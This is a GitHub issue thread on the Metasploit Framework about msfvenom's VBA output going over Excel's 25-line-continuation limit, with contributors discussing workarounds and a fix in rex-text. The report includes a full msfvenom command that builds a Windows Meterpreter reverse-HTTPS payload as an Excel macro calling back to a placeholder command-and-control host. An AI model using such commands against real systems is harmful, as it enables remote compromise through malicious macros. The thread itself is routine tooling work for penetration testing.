### ISSUE TITLE
msfvenom produces too many line continuations for VBA output

### ISSUE THREAD

**Issue by jeffmcjunkin** [rapid7/metasploit-framework#8147]
## Steps to reproduce

How'd you do it?

1. Ran `msfvenom -p windows/meterpreter/reverse_https LHOST=command-and-control.deathstar.empire.invalid LPORT=443 EXITFUNC=thread -f vba` to get Excel macro.
2. Attempted to paste resulting text into Excel from Office 365 (latest version as far as I can tell). 
3. Received error from Excel: 

![image](https://cloud.githubusercontent.com/assets/1383363/24268044/96a1ae8e-0fc9-11e7-850f-e9ebc0c3e198.png)

More background: https://msdn.microsoft.com/en-us/library/office/gg264236.aspx

Looks like the `vba` format will need to limit line continuations to 25. There are a few methods that can be used: http://stackoverflow.com/questions/2806151/excel-macros-too-many-line-continuations

## Expected behavior

Code should paste into Visual Basic for Applications without issue.

### What happens instead?

Pasting `msfvenom` output into Visual Basic for Applications shows the aforementioned issue. 

### framework.log output?

Nothing, as there's no "error" from `msfvenom`'s perspective.

### Metasploit version

```
$ dpkg -l metasploit-framework
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name                         Version             Architecture        Description
+++-============================-===================-===================-==============================================================
ii  metasploit-framework         4.14.3+201703180932 amd64               The full stack of metasploit-framework
```

### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [X] Source install

```
jeff@desktop:/opt/metasploit-framework/embedded/bin$ ./ruby --version
ruby 2.3.3p222 (2016-11-21 revision 56859) [x86_64-linux]
```

### OS

Ubuntu 16.04 x64

**Comment by vysec** [comment]
Just combine a few lines?

**Comment by jeffmcjunkin** [comment]
@vysec Yup, that's a workaround. Since even `windows/meterpreter/reverse_https` is only 27 lines when the maximum is 25, combining a few lines is fine.

I tracked down what was doing the conversion to `/opt/metasploit-framework/embedded/lib/ruby/gems/2.3.0/gems/rex-text-0.2.12/lib/rex/text/lang.rb`, which corresponds to https://github.com/rapid7/rex-text/blob/master/lib/rex/text/lang.rb. Line 128 has the number of bytes to put on a single line. A dirty hack is just to increase that from 20 to 30, and the subsequent output from `msfvenom` (at only 16 lines) works without issue.

I agree there's a workaround, I'd just like `msfvenom` to create valid code :)

**Comment by vysec** [comment]
Fair enough. I'm not sure many people use the code out of the box anyways. Most will modify it etc.

**Comment by rwhitcroft** [comment]
@jeffmcjunkin it looks like you've done most of the leg work - feel like submitting a PR to fix?

**Comment by jeffmcjunkin** [comment]
@rwhitcroft I'm okay with submitting the dirty hack I proposed above, after some sanity checks. 

What're some of the largest payloads? I'll set the line length to something that all of those payloads will work with.
